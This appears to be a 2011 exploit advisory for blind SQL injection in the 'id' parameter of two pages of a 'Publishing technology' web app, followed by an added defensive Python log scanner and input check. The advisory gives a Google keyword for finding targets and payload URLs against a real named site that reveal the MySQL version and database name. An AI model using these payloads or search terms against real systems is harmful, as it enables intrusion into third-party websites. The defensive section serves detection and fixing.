Sunday, 24 April 2011

Publishing technology <= BLIND SQL Injection Vulnerabilities

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Publishing technology
|~Price : N/A
|~Version : N/A
|~Software: www.publishingtechnology.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Google Keyword : "Powered by Publishing technology AS"
|[~]Date : "24.04.2011"
|[~]Tested on :
Web Server:     Microsoft-IIS/6.0
Powered-by:     ASP.NET
DB Server:      MySQL >=5
----------------------------------------------------------
Details.asp: the 'id' parameter is not secured
CollectionContent.asp: the 'id' parameter is not secured
 
-- Demos.
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Exploitation| Blind SQL Injection~~~~~~~~~~~}|
     
    Example
     
    MySQL version?
    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4  {FALSE}
    SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE}
     
    Database name?
    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r'
    MySQL returns : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist
    Database Name Found! : "leslie"
    
    
    The rest of the exploitation is up to you.
     
    ================================================================
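
Added example (not part of the original advisory or the vendor's code): a defender-side check that scans IIS W3C log lines for requests to the two pages named above whose 'id' value is not a plain integer, using the same allow-list test the application should apply before it builds its query. The log layout, sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Pages named in the advisory whose 'id' parameter reaches the SQL query.
AFFECTED_PAGES = {"/details.asp", "/collectioncontent.asp"}
# Allow-list: 'id' must be a short run of ASCII digits and nothing else.
STRICT_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample log (W3C extended format, documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-04-24 10:00:01 192.0.2.10 GET /CollectionContent.asp id=24 200
2011-04-24 10:00:05 192.0.2.77 GET /CollectionContent.asp id=24+and+substring(@@version,1,1)=5 200
2011-04-24 10:00:09 192.0.2.77 GET /Details.asp id=7%20and%201=1 200
2011-04-24 10:00:12 192.0.2.10 GET /About.asp id=abc 200
"""

def is_valid_id(value):
    """Server-side check to run before 'id' is used in any query."""
    return STRICT_ID.fullmatch(value) is not None

def suspicious_requests(log_text):
    """Return (client_ip, page, decoded_id) for every non-integer 'id'."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for following rows
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() not in AFFECTED_PAGES:
            continue
        # parse_qsl splits on the first '=' only and decodes '+' and %xx,
        # so an appended boolean condition stays inside the 'id' value.
        query = row.get("cs-uri-query", "-")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "id" and not is_valid_id(value):
                hits.append((row.get("c-ip"), row["cs-uri-stem"], value))
    return hits

if __name__ == "__main__":
    for ip, page, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {page} id={value!r}")
```

Rejecting non-integer values closes the input path shown in the demo; the query itself should also be parameterized, and detailed ODBC error text should not be returned to the client, since that error text is what disclosed the database name above.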
